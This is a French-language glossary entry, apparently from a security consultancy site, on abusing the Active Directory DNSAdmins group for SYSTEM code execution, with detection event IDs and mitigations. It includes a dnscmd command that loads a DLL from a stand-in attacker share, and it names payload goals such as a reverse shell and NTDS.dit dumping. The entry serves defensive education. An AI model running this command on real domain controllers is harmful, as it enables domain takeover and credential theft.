DNSAdmins Abuse
adDéfinition
Le DNSAdmins Abuse désigne l'exploitation historique d'un groupe de sécurité Active Directory nommé DNSAdmins, conçu pour déléguer l'administration du service DNS intégré à l'annuaire sans accorder les privilèges complets de Domain Admin, mais ayant longtemps disposé, par une conséquence de configuration par défaut, d'un vecteur d'escalade de privilèges permettant d'obtenir une exécution de code avec les privilèges SYSTEM sur le serveur hébergeant le rôle DNS, fréquemment un contrôleur de domaine lui-même. Cette technique reposait sur la capacité des membres de DNSAdmins à configurer le paramètre ServerLevelPluginDll du service DNS Windows, spécifiant une bibliothèque DLL arbitraire chargée automatiquement au redémarrage ou au rechargement du service, un attaquant contrôlant un compte membre de ce groupe pouvant ainsi désigner une DLL malveillante sous son contrôle pour obtenir une exécution de code privilégiée. Microsoft a publié des correctifs et recommandations restreignant progressivement cette exposition, mais la vigilance reste de mise dans les environnements n'ayant pas appliqué les dernières mises à jour de sécurité concernées. Cette technique illustre un cas emblématique de délégation d'administration en apparence limitée à un périmètre fonctionnel précis — la gestion DNS — se révélant en réalité exploitable pour une compromission complète de la machine hébergeant le service, justifiant un audit rigoureux de la composition de ce groupe dans tout environnement Active Directory.
Fonctionnement technique
dnscmd.exe [DC] /config /serverlevelplugindll \\attacker\share\malicious.dll — configure une DLL plugin au niveau serveur DNS. Au redémarrage du service DNS (sc stop/start dns), le processus dns.exe (SYSTEM) charge et exécute la DLL malveillante. La DLL peut créer un backdoor DA, dumper NTDS.dit, etc.
Exploitation et vecteurs d'attaque
- Prérequis : Membre du groupe DNSAdmins
- Impact : Exécution SYSTEM sur DC → DA complet
- DLL payload : Reverse shell, ajout backdoor DA, dump LSASS
Détection et mitigation
- Event ID 770 (DNS server) : plugin DLL chargée
- Event ID 150 : DNS restart avec plugin
- Limiter le groupe DNSAdmins aux besoins stricts
- AppLocker/WDAC : bloquer le chargement de DLL non signées dans dns.exe
Articles liés
Expert en cybersécurité offensive et intelligence artificielle. Pentest, audit et développement IA sur-mesure.
Services
- Audit Infrastructure
- Audit Kubernetes
- Audit Microsoft 365
- Audit Sécurité Réseau
- Analyse de Risques
- Audit Active Directory
- Audit Application Web
- Audit Cloud (AWS/Azure/GCP)
- Audit Messagerie
- Audit API (OWASP Top 10)
- Audit DevSecOps & CI/CD
- Audit Code Source (SAST)
- Audit Postes de Travail
- Audit Sauvegarde & Résilience
- Audit OT/SCADA (IEC 62443)
- Développement IA
- Formations
Ressources
Projets & Outils
© 2026 Ayi NEDJIMI Consultants. Tous droits réservés.
Un projet cybersécurité ?
Expert dispo · Réponse 24h